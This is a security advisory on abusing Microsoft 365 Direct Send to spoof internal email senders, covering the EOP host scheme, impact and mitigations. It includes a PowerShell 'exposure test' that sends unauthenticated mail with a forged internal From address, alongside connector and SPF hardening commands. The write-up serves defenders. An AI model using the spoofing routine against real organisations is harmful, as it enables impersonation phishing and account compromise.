This vector abuses the Microsoft 365 Direct Send feature to deliver phishing emails from an external sender to an internal user while spoofing the properties of a valid internal user. The "feature" has existed since before 2016; however, threat intelligence available to JUMPSEC has only recently observed it being abused.
Abuse Primitives
As part of research conducted by JUMPSEC and other organisations, this "feature" can be abused from outside the organisation to spoof internal email. Without any access to the network or credentials, an attacker can send email that appears to pass between internal users: the sender address is spoofed and the message is attributed to that user. The caveat is that the technique relies on the organisation routing its mail through an external mail gateway provider such as Mimecast, because mail that arrives directly at the tenant's Exchange Online Protection endpoint bypasses that gateway's filtering.
Organisations that consume Exchange Online through Microsoft 365 are automatically provisioned with an inbound Exchange Online Protection host for each accepted domain, of the form company-tld.mail.protection.outlook.com (the domain with its dots replaced by hyphens, which is also the value Microsoft asks you to publish as the MX record). That host accepts unauthenticated SMTP on port 25 whether or not the published MX record points at it, and can be used as an SMTP server to deliver mail to valid users inside the organisation.
Am I Affected?
As part of an ongoing effort, JUMPSEC has built a service that allows organisations to check whether they are affected and whether their implemented controls fix the issue:
Visit the following URL and follow the instructions.
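The abuse primitive and the self-check above are the same operation viewed from two sides: derive the tenant's EOP host from the domain, confirm it answers on port 25, and try to deliver an unauthenticated message whose From and To are both internal addresses. The following PowerShell is an added example, not JUMPSEC's checker service or tooling. It assumes Windows PowerShell 5.1 or later with the DnsClient module (Resolve-DnsName, Test-NetConnection) and outbound TCP/25 from the machine it runs on; the domain and mailbox addresses are placeholders to be replaced with ones in a tenant you are authorised to test.

```powershell
# Added example, not JUMPSEC's code. Placeholders: example.com and its mailboxes.
# Send-MailMessage is flagged obsolete in PowerShell 7 but still performs a plain,
# unauthenticated SMTP submission, which is exactly what Direct Send accepts.

function Get-EopSmartHost {
    # EOP publishes one inbound host per accepted domain: dots become hyphens.
    param([Parameter(Mandatory)][string]$Domain)
    return ($Domain.ToLower() -replace '\.', '-') + '.mail.protection.outlook.com'
}

function Test-DirectSendExposure {
    param(
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][string]$From,   # internal address to spoof
        [Parameter(Mandatory)][string]$To      # internal mailbox that should receive the test
    )
    $eopHost = Get-EopSmartHost -Domain $Domain

    # 1. Where does the published MX point? A third-party gateway here, with the EOP host
    #    still accepting mail, is the exposed configuration described in the write-up.
    $mx = Resolve-DnsName -Name $Domain -Type MX -ErrorAction Stop |
          Where-Object { $_.Type -eq 'MX' } |
          Sort-Object Preference | Select-Object -First 1
    $mxIsEop = $mx.NameExchange -like '*.mail.protection.outlook.com'
    Write-Host "MX for $Domain -> $($mx.NameExchange) (points at EOP: $mxIsEop)"

    # 2. Does the tenant's EOP host exist and listen on 25?
    if (-not (Resolve-DnsName -Name $eopHost -ErrorAction SilentlyContinue)) {
        return [pscustomobject]@{ Domain = $Domain; EopHost = $eopHost; Result = 'no-eop-host' }
    }
    $tcp = Test-NetConnection -ComputerName $eopHost -Port 25 -WarningAction SilentlyContinue
    if (-not $tcp.TcpTestSucceeded) {
        return [pscustomobject]@{ Domain = $Domain; EopHost = $eopHost; Result = 'port-25-closed' }
    }

    # 3. Unauthenticated Direct Send: internal From, internal To, no credentials.
    #    A tenant with a restricted inbound partner connector answers 550 5.7.51.
    try {
        Send-MailMessage -SmtpServer $eopHost -Port 25 -From $From -To $To `
            -Subject 'Direct Send exposure test' `
            -Body "Unauthenticated message submitted directly to $eopHost" `
            -ErrorAction Stop
        $result = 'accepted'   # now check the $To mailbox: if it landed, the tenant is exposed
    } catch {
        $result = if ($_.Exception.Message -match '5\.7\.51') { 'rejected-by-connector' }
                  else { "rejected: $($_.Exception.Message)" }
    }
    [pscustomobject]@{ Domain = $Domain; EopHost = $eopHost; MX = $mx.NameExchange; Result = $result }
}

# Usage (placeholder values):
# Test-DirectSendExposure -Domain 'example.com' -From 'ceo@example.com' -To 'analyst@example.com'
```

An SMTP-level "accepted" is not the whole answer: EOP may still quarantine or junk the message on content or SPF grounds, so the test is only conclusive once the recipient mailbox is inspected. A 550 5.7.51 response means an inbound connector restricted to specific IPs or a certificate is already in place.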
Impact
The technique grants the ability to send email as trusted users within an organisation. Spoofing and controlling the sender address enables more convincing phishing: because the spoofed sender resolves to a real M365 user, the recipient's client populates the message with that user's directory properties, including profile photo and Teams presence, luring victims into believing the email genuinely comes from a colleague. Without more granular preventative controls, this can lead to compromise of accounts, assets and resources.
JUMPSEC expects threat groups to be using this technique against affected organisations. Because exposure can be determined with a single dig query of a domain's MX record, identifying likely targets is trivial, and the users of those organisations can be enumerated from previous breaches and from targeted open source intelligence gathering.
Mitigations
Direct Send could not be disabled when this was written (Exchange Online has since gained an organisation-level RejectDirectSend setting that refuses such messages outright). If you use an external mail gateway, the most effective mitigation is to force all inbound and internal mail flow through that gateway and refuse mail that reaches the tenant from any untrusted source.
Additionally, enabling the "SPF record: hard fail" option in the Exchange Online Protection (EOP) anti-spam policy adds an extra layer of protection, since a message forging an internal sender from an IP not listed in your SPF record fails SPF for your own domain; it should be enabled where possible.
Additional controls can be configured in the Exchange Admin Center using connectors, which allow bespoke routing when mail needs to be handled differently. An inbound partner connector can be configured to accept mail for the organisation only from your mail gateway's IP addresses (or its TLS certificate), so that anything arriving directly at the tenant's EOP host from another source is rejected. Inbound connectors accept messages from remote domains according to the specific options set on them.
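The SPF hard-fail setting and the restricted inbound connector described above, expressed in Exchange Online PowerShell, as an added example rather than JUMPSEC's own guidance verbatim. It assumes the ExchangeOnlineManagement module, an account with Exchange Administrator rights, and a gateway whose egress IPs you know; the admin UPN, connector name and the two 203.0.113.x addresses are placeholders to be replaced with your gateway provider's published ranges.

```powershell
# Added example, not JUMPSEC's code. Placeholders: admin UPN and gateway IPs (TEST-NET-3).
Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline -UserPrincipalName 'admin@example.com'

# Egress addresses of the mail gateway (Mimecast or similar) that all mail must traverse.
$gatewayIPs = @('203.0.113.10', '203.0.113.11')

# 1. Treat SPF hard fail as spam in the default anti-spam (hosted content filter) policy.
#    Only effective if your SPF record lists just the gateway and ends in -all.
Set-HostedContentFilterPolicy -Identity 'Default' -MarkAsSpamSpfRecordHardFail On

# 2. Inbound partner connector for every sender domain, restricted to the gateway's IPs.
#    Mail reaching company-tld.mail.protection.outlook.com from any other source is then
#    refused with 550 5.7.51 TenantInboundAttribution.
New-InboundConnector -Name 'Accept inbound mail only from gateway' `
    -ConnectorType Partner `
    -SenderDomains '*' `
    -SenderIPAddresses $gatewayIPs `
    -RestrictDomainsToIPAddresses $true `
    -RequireTls $true `
    -Enabled $true

# 3. Where the tenant exposes the newer organisation-level switch (added by Microsoft
#    after this write-up), refuse Direct Send entirely.
Set-OrganizationConfig -RejectDirectSend $true

# Verify the resulting configuration.
Get-InboundConnector |
    Format-List Name, ConnectorType, SenderDomains, SenderIPAddresses, RestrictDomainsToIPAddresses
Get-HostedContentFilterPolicy -Identity 'Default' | Select-Object MarkAsSpamSpfRecordHardFail
```

Before applying the connector, inventory anything that currently relies on Direct Send legitimately (multifunction printers, scanners, line-of-business applications submitting to the EOP host): after the change they receive the same 550 5.7.51 rejection and must be moved behind the gateway or onto an authenticated SMTP relay.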
The below is the response when a connector has been configured to accept traffic only from a specific IP address:
550 5.7.51 TenantInboundAttribution; There is a partner connector configured that matched the message's recipient domain. The connector had either the RestrictDomainsToIPAddresses or RestrictDomainsToCertificate set [XXXX] (Net::SMTPFatalError)